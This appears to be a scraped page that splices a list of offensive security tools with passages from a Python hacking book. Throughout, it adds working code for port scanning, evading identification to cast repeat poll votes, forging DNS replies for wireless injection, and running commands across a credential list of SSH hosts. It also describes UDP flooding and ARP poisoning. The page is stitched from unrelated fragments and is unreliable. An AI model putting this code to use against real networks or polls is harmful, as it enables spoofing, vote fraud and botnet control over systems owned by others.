Hacking tools list pdf

HTTrack is an offline browser utility. It allows you to download a World Wide Web site from the Internet to a local directory, recursively building all directories and fetching HTML, images, and other files from the server to your computer. HTTrack can also update an existing mirrored site and resume interrupted downloads. It is fully configurable and has an integrated help system; see the download page for packages and installation instructions.

Arachni is a web application scanner. Unlike Nessus, however, Arachni can only scan one host on one port at a time.

If a host runs several web services on different ports, each of them has to be scanned in a separate run.

Arachni is also highly configurable. Its plugins and settings allow for accurate checking, and all plugins are enabled by default. Reporting is straightforward and can be produced in many different output formats.

sqlmap ships with Kali Linux by default and is the tool of choice for pulling information out of a database server through SQL injection. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches ranging from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

John, better known as John the Ripper, is a tool for finding weak user passwords on a server. It can run a wordlist or a search pattern against a password hash file. John supports several cracking modes and understands many hash formats, including several DES-based crypt variants, MD5-crypt and the Blowfish-based bcrypt.

Hashcat was first written around 2009, at a time when, for some unknown reason, the existing password crackers did not support multi-threading.

A separate, unnamed Windows password-recovery tool allows easy recovery of various kinds of passwords by sniffing the network, cracking encrypted passwords using dictionary, brute-force and cryptanalysis attacks, recording VoIP conversations, decoding scrambled passwords, recovering wireless network keys, revealing password boxes, uncovering cached passwords and analysing routing protocols.

According to the official thc-hydra website, one of the biggest security holes is passwords, as every password security study shows. Hydra is proof-of-concept code that gives researchers and security consultants a way to show how easy it would be to gain unauthorized remote access to a system and to various online services.

Several login-cracking tools already exist, but none of them supports more than one protocol to attack, or parallelized connections.

fcrackzip works on password-protected zip archives: all files in the archive must be encrypted with the same password, and the more files you provide, the better. Have you ever mistyped a password for unzip?

While the encryption algorithm used by zip is relatively secure, PK (PKWARE) made cracking easy by providing hooks for very fast password checking directly in the zip file. Understanding these is crucial to zip password cracking. Tutorial: fcrackzip on Windows to crack a zip password.

Aircrack-ng is not a single tool but a complete suite of tools used to audit wireless network security. All of them are command-line programs, which allows heavy scripting, and many GUIs have taken advantage of that. It is easy to use.

Python is a modern programming language that gives you direct access to the BSD socket interface.

If you are new to the concept, BSD sockets provide an interface for writing applications that communicate over a network between hosts. Once you know the IP address and the TCP ports associated with the service you want to target, you can plan your attack better.

Most of the time this information is available to the organization's system administrators, and it is also something admins need to keep from an attacker. Before you can launch any attack on a network, you need to gather it first.

Making Your Port Scanner

Port scanning is a method for assessing which ports on a targeted computer are open, and what service is running on each open port.

Since computers communicate with other devices, and perform their functions, by opening ports to send and receive data, open ports are the attack surface an intruder will want to exploit. Think of an open port as an open window to a burglar: it is a free passage for anyone who wants to steal data or set up shop inside the computer and exploit its weaknesses over an extended period.

Note that port scanning is not in itself illegal; network security staff routinely scan client computers to learn about their exposure and apply the needed controls.

However, port scanning is also the main way for an attacker to discover new victims and find the best way into their systems. A port scanner lets you look at hosts and the services attached to them. As you may have guessed, sockets are behind almost everything that involves network communication.

When you open a web browser, your computer opens a socket to talk to a web server. The same happens when you communicate with other computers online or send a print job to your printer over Wi-Fi. Open your text editor and save the following code as portscanner.py.
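The page's own portscanner script is not reproduced above, so what follows is an added example (my code, not the book's) of a TCP connect scanner built on the socket module. It scans a port list concurrently, names the service from the local services database, and includes a constructed demo that binds a listener on the loopback interface so the scanner can be exercised offline; the only hosts and ports involved are the ones the demo creates.

```python
import socket
import threading
from concurrent.futures import ThreadPoolExecutor


def scan_port(host, port, timeout=1.0):
    """TCP connect scan of a single port.

    Returns True when connect() completes (a listener accepted the handshake),
    False when the port is closed, filtered, or the host is unreachable.
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
        sock.settimeout(timeout)
        try:
            sock.connect((host, port))
        except OSError:  # ConnectionRefusedError, timeout, no route, ...
            return False
        return True


def scan_ports(host, ports, timeout=1.0, workers=50):
    """Scan an iterable of ports concurrently; return the open ones, sorted."""
    ports = list(ports)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        flags = list(pool.map(lambda p: scan_port(host, p, timeout), ports))
    return sorted(p for p, is_open in zip(ports, flags) if is_open)


def service_name(port):
    """Best-effort service name from the local services database (/etc/services)."""
    try:
        return socket.getservbyport(port, "tcp")
    except OSError:
        return "unknown"


def demo_local_scan():
    """Constructed, offline demo: bind one listener on the loopback interface,
    reserve-and-release a second port that is therefore closed, scan both.

    Returns (listening_port, closed_port, open_ports_found).
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind(("127.0.0.1", 0))          # port 0: let the OS pick a free one
    listener.listen(5)
    open_port = listener.getsockname()[1]

    probe = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    probe.bind(("127.0.0.1", 0))
    closed_port = probe.getsockname()[1]
    probe.close()                             # nobody listens here now

    def accept_loop():
        try:
            while True:
                conn, _ = listener.accept()
                conn.close()
        except OSError:                       # raised once listener is closed
            pass

    threading.Thread(target=accept_loop, daemon=True).start()
    try:
        found = scan_ports("127.0.0.1", [open_port, closed_port], timeout=0.5)
    finally:
        listener.close()
    return open_port, closed_port, found


if __name__ == "__main__":
    open_port, closed_port, found = demo_local_scan()
    for p in found:
        print(f"{p}/tcp open ({service_name(p)})")
```

A connect scan completes the TCP handshake, so every probe shows up in the target's application logs; that is the trade-off for needing no raw-socket privileges.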

Each website has different features, but a browser will usually fetch a particular text document, parse it and render it for the user, much as the Python interpreter reads and interprets a source file.

Python has several libraries that handle web content; for this hack you will use Mechanize, whose main class is Browser. A short Mechanize script can fetch a website's source code; running it against syngress prints that page's HTML. As you may know, web servers log the IP addresses of the users who view their pages in order to identify them.

This can usually be prevented by using a VPN (virtual private network) or Tor. With a VPN, all your traffic is routed through the private network automatically. The same idea lets you use Python to connect through proxy servers instead, giving your program an added layer of anonymity: the Browser class lets you specify a proxy server for a particular program to use.

For this script, you can use the HTTP proxy provided by www. If that proxy is no longer available, simply go to the site and pick another HTTP proxy.

The website you are accessing will then believe that the request comes from the proxy. Now continue building your script. At this point your browser already has a single layer of anonymity. However, websites also use a string called the User-Agent to tell apart the browsers that visit them. This string normally lets the website learn about the client so it can serve tailored HTML for a better user experience.

Malicious websites can also use that information to attack the browser a targeted user runs, and some travel websites have used User-Agent strings to detect visitors on MacBooks and show them more expensive options. Since you are using Mechanize, you can change the User-Agent string just as you changed the proxy; after that, the website you are browsing thinks you are using Netscape 6.

Next, the websites you visit will try to set cookies that they can use as a unique identifier to recognize you as a repeat visitor the next time you return. To stop them from identifying you, clear all cookies from your browser whenever you perform actions you want to keep anonymous. Another Python library, cookielib (http.cookiejar in Python 3), provides container types for handling the cookies a website presents to you.

This lets you call the class through a browser object later. It also holds the functions you wrote earlier, which you can call individually or all at once through the anonymize function. anonymize can optionally wait 60 seconds, which spaces your requests out in time; this changes nothing in the data you submit, but it lowers the chance that the websites notice that the requests come from a single source.

You will also notice the anonBrowser file. Now you can write a script that uses the class you just created. In this example you will cast votes in an online competition on the kittenwar site.

With this script you visit the target site anonymously five times, which lets you cast five votes from the same computer. Each run fetches the target page in a new, unique session, which means you present different cookies on every visit.
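As an added example (mine, not the book's Mechanize/Python 2 anonBrowser code), here is the same idea on the Python 3 standard library: one class that rotates proxy, User-Agent and cookie jar, and a helper that inspects the identity the next request would present. The User-Agent strings and the proxy address 127.0.0.1:8080 are constructed placeholders.

```python
import http.cookiejar
import random
import time
import urllib.request

# Constructed sample strings; a real run would use current browser strings.
USER_AGENTS = [
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 13_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15",
    "Mozilla/5.0 (X11; Linux x86_64; rv:120.0) Gecko/20100101 Firefox/120.0",
]


class AnonBrowser:
    """Rotate the three identifiers a web server sees: source IP (via proxy),
    User-Agent string, and cookies."""

    def __init__(self, proxies=None, user_agents=None):
        self.proxies = list(proxies or [])
        self.user_agents = list(user_agents or USER_AGENTS)
        self.cookie_jar = http.cookiejar.CookieJar()
        self.proxy = None
        self.user_agent = None
        self.anonymize()

    def clear_cookies(self):
        # A fresh jar means no identifier from an earlier visit is sent back.
        self.cookie_jar = http.cookiejar.CookieJar()

    def change_user_agent(self):
        self.user_agent = random.choice(self.user_agents)

    def change_proxy(self):
        self.proxy = random.choice(self.proxies) if self.proxies else None

    def anonymize(self, sleep_seconds=0):
        """New cookies, User-Agent and proxy; optionally pause so that
        consecutive requests are not tightly clustered in time."""
        self.clear_cookies()
        self.change_user_agent()
        self.change_proxy()
        if sleep_seconds:
            time.sleep(sleep_seconds)

    def build_opener(self):
        handlers = [urllib.request.HTTPCookieProcessor(self.cookie_jar)]
        if self.proxy:
            handlers.append(urllib.request.ProxyHandler(
                {"http": self.proxy, "https": self.proxy}))
        opener = urllib.request.build_opener(*handlers)
        opener.addheaders = [("User-Agent", self.user_agent)]
        return opener

    def open(self, url, timeout=10):
        """Fetch url with the current identity; returns the response body bytes."""
        with self.build_opener().open(url, timeout=timeout) as resp:
            return resp.read()


def current_identity(browser):
    """Inspect the opener the browser would use: (user_agent, http_proxy)."""
    opener = browser.build_opener()
    proxy = None
    for handler in opener.handlers:
        if isinstance(handler, urllib.request.ProxyHandler):
            proxy = handler.proxies.get("http")
    return dict(opener.addheaders)["User-Agent"], proxy


if __name__ == "__main__":
    browser = AnonBrowser(proxies=["http://127.0.0.1:8080"])   # assumed proxy
    for _ in range(5):
        browser.anonymize()
        print(current_identity(browser))
```

Note that only the cookies, the header and the proxy change; a server that fingerprints TLS handshakes or request timing can still correlate the five visits, which is why the page's anonymize function offers the 60-second pause.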

Wireless Attack: Dnspwn

This attack builds on airpwn, a framework for 802.11 (wireless) packet injection. airpwn listens for incoming packets and, when the data matches a pattern specified in its config file, injects a response towards the client; to the target, airpwn looks and behaves like the server it was trying to talk to. To perform this attack you need BackTrack or Kali Linux installed, plus a wireless adapter that supports monitor mode and injection.

Follow these steps:

1. Put the wireless card into monitor mode, using airmon-ng from Kali Linux.
2. Once a monitor interface is up, write the attack code. You need the scapy module to perform the dnspwn attack.
3. With scapy available, write the function that parses the DNS request for the queried name and injects the response, building the packet layer by layer. scapy keeps this simple by abstracting away many details you do not need to worry about.

Once scapy has abstracted the rest away, the remaining code only sets the flags for the attack.

As you may have noticed, there is a limit to how much data you can send and receive through the network and your own interfaces. That limit is your available bandwidth: the fewer other users compete for it, the faster your connections.
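The scapy script for the injection step is not shown above. The following added example (my code, neither airpwn's nor the book's) works one level lower and builds the DNS messages by hand with struct, so it runs without scapy or a wireless interface. It shows what the injected packet has to get right: copy the transaction ID and the question section of the captured query, and answer only for names on the target list. The query, the target name www.example.com and the spoofed address 10.0.0.66 are constructed; putting the reply on the air before the real resolver answers is the part the airpwn/scapy setup handles and is not done here.

```python
import struct


def encode_name(name):
    """'www.example.com' -> b'\\x03www\\x07example\\x03com\\x00'"""
    out = b""
    for label in name.rstrip(".").split("."):
        out += bytes([len(label)]) + label.encode("ascii")
    return out + b"\x00"


def decode_name(pkt, offset):
    """Read a (possibly compressed) name at offset; return (name, next_offset)."""
    labels = []
    while True:
        length = pkt[offset]
        if length & 0xC0 == 0xC0:                       # compression pointer
            pointer = struct.unpack("!H", pkt[offset:offset + 2])[0] & 0x3FFF
            tail, _ = decode_name(pkt, pointer)
            labels.append(tail)
            return ".".join(labels), offset + 2
        offset += 1
        if length == 0:
            return ".".join(labels), offset
        labels.append(pkt[offset:offset + length].decode("ascii"))
        offset += length


def build_query(txid, name, qtype=1):
    """Standard recursive query for one record (qtype 1 = A)."""
    header = struct.pack("!HHHHHH", txid, 0x0100, 1, 0, 0, 0)
    return header + encode_name(name) + struct.pack("!HH", qtype, 1)


def parse_query(pkt):
    """Return (txid, qname, qtype, end_of_question_offset)."""
    txid, flags, qdcount = struct.unpack("!HHH", pkt[:6])
    if flags & 0x8000 or qdcount != 1:
        raise ValueError("not a single-question query")
    name, off = decode_name(pkt, 12)
    qtype, _qclass = struct.unpack("!HH", pkt[off:off + 4])
    return txid, name, qtype, off + 4


def should_inject(pkt, targets):
    """The airpwn-style match: inject only for A queries naming a target."""
    try:
        _, name, qtype, _ = parse_query(pkt)
    except (ValueError, IndexError, struct.error):
        return False
    return qtype == 1 and name.lower() in targets


def build_spoofed_response(query_pkt, spoofed_ip, ttl=60):
    """Answer the query with an attacker-chosen A record.

    The transaction ID and the question section are copied from the query so
    the resolver accepts the reply; only the answer section is ours.
    """
    txid, name, qtype, qend = parse_query(query_pkt)
    if qtype != 1:
        raise ValueError("only A queries are handled")
    header = struct.pack("!HHHHHH", txid, 0x8180, 1, 1, 0, 0)  # QR, RD, RA set
    question = query_pkt[12:qend]
    rdata = bytes(int(octet) for octet in spoofed_ip.split("."))
    # name = pointer to offset 12 (the question name), type A, class IN
    answer = struct.pack("!HHHIH", 0xC00C, 1, 1, ttl, len(rdata)) + rdata
    return header + question + answer


def parse_response(pkt):
    """Return (txid, name, ipv4) from the first A answer."""
    txid, flags, qdcount, ancount = struct.unpack("!HHHH", pkt[:8])
    if not flags & 0x8000 or ancount < 1:
        raise ValueError("not a response with answers")
    off = 12
    for _ in range(qdcount):
        _, off = decode_name(pkt, off)
        off += 4                                        # qtype + qclass
    name, off = decode_name(pkt, off)
    rtype, _rclass, _ttl, rdlen = struct.unpack("!HHIH", pkt[off:off + 10])
    off += 10
    if rtype != 1 or rdlen != 4:
        raise ValueError("first answer is not an A record")
    return txid, name, ".".join(str(b) for b in pkt[off:off + 4])


if __name__ == "__main__":
    query = build_query(0x1234, "www.example.com")        # constructed query
    if should_inject(query, {"www.example.com"}):
        reply = build_spoofed_response(query, "10.0.0.66")
        print(parse_response(reply))
```

The defensive reading of the same code: a stub resolver accepts any reply whose transaction ID, source port and question match, which is exactly why the attacker on the same wireless segment wins by answering first. DNSSEC validation or DNS over TLS/HTTPS removes that advantage.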

When someone else consumes all the bandwidth that should be available to you, you are experiencing a denial of service (DoS). Once you have found a service, you can make it behave in a way it is not supposed to, so that the remote host uses up all its available resources and goes offline. Flooding a port that no application is listening on makes the host answer every packet with an ICMP Destination Unreachable message, which costs it further resources.

To do this, open your text editor, enter the code that follows, and save it as udpflood.py. To run it, open IDLE and execute the program; it prompts you for the remaining information it needs.

Note that this hack targets only one port, though you could extend it to all 65,535 ports.

Chapter 9: Hacks for the Web

You may be wondering how to get past certain website protections in order to fetch a file you want, browse anonymously, or learn more about a website you want to penetrate before launching a larger attack.

In this chapter you will learn how to perform several hacks on a website using programs you write in Python.

Creating an SSH Botnet

Now that you can write a port scanner and know how to find vulnerable targets, you can proceed to exploit their vulnerabilities. One way is to use the Secure Shell protocol (SSH) with login credentials obtained from clients.

What is a botnet? Bots, as the name implies, are very useful for automating services on practically any device.

A botnet is a group of bots joined together over a network, which lets system administrators efficiently run automated tasks across an entire set of machines connected through a server or a local network. While botnets are essentially tools for managing many computers at once, they can also be used for unintended purposes, such as a DoS or DDoS (distributed denial of service) attack that floods a website with requests, or for posting comments on social media sites continuously.

Assume the host credentials are stored in a file with one entry per line in the format: username hostname:port password. With these credentials in hand, consider the functions you need to write.

You will want a status check to see which hosts are up, an interactive shell session with a chosen host, and a way to run a command on selected hosts. To begin, import every member of the fabric namespace. With the credentials set up this way, you will not have to type each password for every new connection. Then move on to running commands: build a menu that lets you execute the other tasks on the specified hosts using Fabric's execute function.
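As an added example (mine, not the book's Fabric 1 script), here is the credential-file parser for the format above, with the validation the book's one-liner skips, and a command runner on the Fabric 2 Connection API. The sample credential lines are constructed; Fabric is imported only inside run_on_hosts, so the parser can be used and tested without it installed.

```python
from dataclasses import dataclass

# Constructed sample file in the page's format: username hostname:port password
SAMPLE_CREDENTIALS = """\
# lab hosts (constructed)
root 10.0.0.5:22 hunter2
admin 10.0.0.6 s3cret
deploy 10.0.0.7:2222 correct horse battery staple
"""


@dataclass(frozen=True)
class Host:
    user: str
    hostname: str
    port: int
    password: str

    @property
    def host_string(self):
        """Fabric 1-style 'user@host:port' string."""
        return f"{self.user}@{self.hostname}:{self.port}"


def parse_credentials(text):
    """Parse 'username hostname:port password' lines into Host records.

    Blank lines and '#' comments are skipped; a missing port defaults to 22;
    a password may contain spaces (everything after the second field); and a
    malformed line raises ValueError with its line number rather than being
    dropped silently from the host list.
    """
    hosts = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(maxsplit=2)
        if len(parts) != 3:
            raise ValueError(f"line {lineno}: expected 'user host:port password'")
        user, target, password = parts
        hostname, _, port = target.partition(":")
        if not hostname:
            raise ValueError(f"line {lineno}: empty hostname")
        try:
            port_num = int(port) if port else 22
        except ValueError:
            raise ValueError(f"line {lineno}: bad port {port!r}") from None
        if not 1 <= port_num <= 65535:
            raise ValueError(f"line {lineno}: port {port_num} out of range")
        hosts.append(Host(user, hostname, port_num, password))
    return hosts


def run_on_hosts(hosts, command, timeout=10):
    """Run one command on every host; return {host_string: (ok, output)}.

    Hosts that fail to connect or authenticate are reported with the error text
    instead of being skipped, so the status check shows every host.
    """
    from fabric import Connection  # pip install fabric (Fabric 2 API)

    results = {}
    for h in hosts:
        conn = Connection(host=h.hostname, user=h.user, port=h.port,
                          connect_kwargs={"password": h.password},
                          connect_timeout=timeout)
        try:
            r = conn.run(command, hide=True, warn=True)
            results[h.host_string] = (r.ok, r.stdout.strip())
        except Exception as exc:  # auth failure, unreachable host, ...
            results[h.host_string] = (False, str(exc))
        finally:
            conn.close()
    return results


if __name__ == "__main__":
    for h in parse_credentials(SAMPLE_CREDENTIALS):
        print(h.host_string)
    # run_on_hosts(parse_credentials(SAMPLE_CREDENTIALS), "uname -a")
```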

Scraping Websites that Need Login Credentials

If you want to mine data from a website, you will often find that you must log in before you can reach the information. To get the data you need, you first need to work out all the details required to log in to the target site.

Because the site prompts for user credentials, you cannot simply walk in and mine the information you want. As you may have guessed, you will build a dictionary holding the login form fields and their values.

Chapter: Understanding Attacks Using Python

Hacking is not only about launching attacks: understanding how black-hat hackers choose, target and penetrate their victims' systems shows you how to use your new knowledge to keep your own systems from being vulnerable to them.

Finding User Locations in Tweets

If you use Twitter, you may think your updates are tweeted at random; in truth you follow an informal formula for the tweets you compose.

A tweet carries other data that may not be visible in its body, such as an image you share or a location. To a hacker, every piece of information in a tweet is useful when planning an attack: you are giving away who you are interested in, which links you and your friends are likely to click, and which trends you want to follow.

When the script returns the results shown, you can deduce that these teams are tweeting live from where they are: the Red Sox are playing in Toronto, while the Nationals are in Denver.

Matching an IP Address to a Physical Location

Most of the time, people are willing to post whatever is on their mind on social media, or to run attacks with tools they download, thinking they will never face the consequences.

While many inexperienced hackers and online trolls think a fake account conceals their identity, you can show that they are not as anonymous as they believe. Several Python libraries and third-party modules can help unmask a user's location from an IP address. Suppose, for example, you suspect that another hacker is targeting your system and you notice a particular IP address probing your open ports.

Python can help you find out where that address is, using a script like the one discussed in this section. With the free GeoLiteCity database, you will write code that matches the IP addresses on a list to cities. Once you have downloaded the database, you can resolve an IP address to a country name, region, postal code and approximate longitude and latitude.

To make the job easier, use the Python library written to query this database. In this hack you will also learn how to analyse a network capture and examine each packet's protocol layers with the dpkt library. Running the script prints the source and destination IP address of each packet. The next step is to match these addresses to a physical location: extend the script with a function retGeoStr that returns a physical location for each IP address the code finds.

For this example you look up the three-letter country code and the city for each IP address and display them. If the lookup raises an exception, handle it by printing a message saying the address is not registered. Once you add retGeoStr to the script you wrote earlier, you have a handy packet-analysis toolkit that shows the physical destinations of the packets you study.
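Added example (my code, not the book's dpkt/GeoIP script): a minimal parser for classic pcap files over Ethernet that yields IPv4 source/destination pairs, plus a retGeoStr-style lookup that reports "Unregistered" for unknown addresses exactly where the book handles the exception. The capture and the geo table are constructed inline; a real run would feed ret_geo_str a GeoIP database reader instead of the dictionary, and would use dpkt or scapy instead of the hand-rolled parser for anything beyond IPv4-over-Ethernet.

```python
import struct

PCAP_MAGIC = 0xA1B2C3D4          # microsecond-resolution classic pcap
LINKTYPE_ETHERNET = 1
ETHERTYPE_IPV4 = 0x0800


def build_ipv4_frame(src, dst, proto=6, payload=b""):
    """Constructed Ethernet II + IPv4 frame (zero MACs, no checksum)."""
    src_b = bytes(int(o) for o in src.split("."))
    dst_b = bytes(int(o) for o in dst.split("."))
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(payload), 0, 0,
                     64, proto, 0, src_b, dst_b)
    eth = b"\x00" * 12 + struct.pack("!H", ETHERTYPE_IPV4)
    return eth + ip + payload


def build_pcap(frames):
    """Wrap frames in a little-endian classic pcap file (global + record headers)."""
    out = struct.pack("<IHHiIII", PCAP_MAGIC, 2, 4, 0, 0, 65535, LINKTYPE_ETHERNET)
    for i, frame in enumerate(frames):
        out += struct.pack("<IIII", 1_700_000_000 + i, 0, len(frame), len(frame))
        out += frame
    return out


def iter_frames(pcap_bytes):
    """Yield each captured frame; handles both byte orders, rejects pcapng."""
    magic = struct.unpack("<I", pcap_bytes[:4])[0]
    if magic == PCAP_MAGIC:
        endian = "<"
    elif magic == 0xD4C3B2A1:
        endian = ">"
    else:
        raise ValueError("not a classic pcap file (pcapng is not handled here)")
    linktype = struct.unpack(endian + "I", pcap_bytes[20:24])[0]
    if linktype != LINKTYPE_ETHERNET:
        raise ValueError(f"unsupported link type {linktype}")
    off = 24
    while off + 16 <= len(pcap_bytes):
        _ts, _us, incl_len, _orig_len = struct.unpack(endian + "IIII",
                                                      pcap_bytes[off:off + 16])
        off += 16
        yield pcap_bytes[off:off + incl_len]
        off += incl_len


def ip_pairs(pcap_bytes):
    """Yield (src, dst) for every IPv4 frame; non-IP or truncated frames are skipped."""
    for frame in iter_frames(pcap_bytes):
        if len(frame) < 34 or struct.unpack("!H", frame[12:14])[0] != ETHERTYPE_IPV4:
            continue
        # IPv4 src/dst sit at fixed offsets 12 and 16 of the IP header,
        # regardless of IHL, so options do not move them.
        yield (".".join(str(b) for b in frame[26:30]),
               ".".join(str(b) for b in frame[30:34]))


def ret_geo_str(ip, lookup):
    """'City, CCC' for a known address, the book's 'Unregistered' otherwise.

    lookup is any callable mapping an IP string to (city, country_code) that
    raises KeyError for unknown addresses; here a dict's __getitem__ stands in
    for a GeoIP database reader.
    """
    try:
        city, country = lookup(ip)
    except KeyError:
        return "Unregistered"
    return f"{city}, {country}"


def geo_report(pcap_bytes, lookup):
    """One line per IPv4 packet: 'src -> dst (destination geo)'."""
    return [f"{src} -> {dst} ({ret_geo_str(dst, lookup)})"
            for src, dst in ip_pairs(pcap_bytes)]


# Constructed sample capture and geo table (not real lookups).
SAMPLE_PCAP = build_pcap([
    build_ipv4_frame("192.168.1.10", "8.8.8.8", proto=17),
    build_ipv4_frame("192.168.1.10", "10.1.2.3"),
    b"\x00" * 14,                                    # runt non-IP frame, skipped
])
SAMPLE_GEO = {"8.8.8.8": ("Mountain View", "USA")}

if __name__ == "__main__":
    for line in geo_report(SAMPLE_PCAP, SAMPLE_GEO.__getitem__):
        print(line)
```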

Now that you know your data may be routed through many different computers, you can see why you need to improve your security by locking down your ports. You will also want to make your own location untraceable, for a number of reasons. As a white-hat exercise, you want to learn how attackers mask their location during reconnaissance or DoS attacks that rely on the Internet Protocol, and to check your own traffic from time to time for unknown IP addresses listening in.

At the same time, you may want to hide your location to avoid being targeted by black-hat hackers. For a black hat, IP spoofing conceals identity and location during an attack. It also lets them impersonate another system and defeat security measures that authenticate on the basis of IP address.

This lets an attacker modify or stop all traffic, or intercept data sent over the network. With the code that follows you can capture every packet routed towards a targeted machine, which means seeing everything the target sends, including private communication that is not protected by encryption.

Find Information About the Targeted Machine

To find out how to attack your target, check the ARP cache on the machine you want to attack. Check the ARP cache again while the attack is running, and verify that the MAC address recorded for the gateway has changed to yours.

Designed to add minimal network overhead, it identifies application behaviour that may be of interest to advanced testers.

BurpSentinel: lets the penetration tester quickly and easily send many malicious requests against the parameters of an HTTP request, and shows plenty of information about the HTTP responses to those attack requests.

It's easy to find low-hanging fruit and hidden vulnerabilities this way, and it lets the tester focus on the more important work.

Autorize: a Burp extension that helps the penetration tester detect authorization vulnerabilities, one of the more time-consuming tasks in a web application penetration test.

Flow: provides a Proxy-history-like view with search and filter capabilities across all Burp tools.

Headless Burp: lets you run Burp Suite's Spider and Scanner tools in headless mode from the command line.

In addition to logging requests and responses from all Burp Suite tools, the extension lets you define advanced filters to highlight interesting entries or restrict the log to the entries that match.

After mapping an application's content as usual, right-click the relevant target in the site map and choose "Scan for WSDL files" from the context menu.

The extension searches the already discovered content for URLs with the .wsdl extension, and the results appear in the extension's output tab in the Burp Extender tool.

JSParser: a Python 2 tool that is especially useful for discovering AJAX requests when doing security research or bug bounty hunting.

Knockpy: a Python tool that enumerates subdomains of a target domain using a wordlist, helping penetration testers and bug hunters collect subdomains for the domain they are targeting.

Sublist3r: enumerates subdomains using many search engines, such as Google, Yahoo, Bing, Baidu and Ask. During recon this can expand the target by turning up old or deprecated code.

WPScan: a free (for non-commercial use) black-box WordPress security scanner written for security professionals and bloggers to test the security of their sites.

Webscreenshot: a simple script that screenshots a list of websites, based on the url-to-image PhantomJS script.

Unfurl: analyzes large collections of URLs and estimates their entropies to sift out URLs that might be vulnerable to attack.

Httprobe: takes a list of domains and probes for working HTTP and HTTPS servers.

Meg: fetches lots of URLs without taking a toll on the servers. It can fetch many paths for many hosts, or fetch a single path for all hosts before moving on to the next path and repeating. Inspired by Tomnomnom's waybackurls.

Dirsearch: a simple command-line tool designed to brute-force directories and files on websites.

It helps you find the security vulnerabilities in your application.

Subfinder: a subdomain discovery tool that finds valid subdomains for websites using passive online sources. It has a simple modular architecture and is optimized for speed. Subfinder is built for one thing only, passive subdomain enumeration, and it does that very well.

EyeWitness: designed to take screenshots of websites, provide some server header info, and identify any default credentials.

EyeWitness is designed to run on Kali Linux. It will auto detect the file you give it with the -f flag as either being a text file with URLs on each new line, nmap xml output, or nessus xml output.

The --timeout flag is completely optional, and lets you provide the max time to wait when trying to render and screenshot a web page.


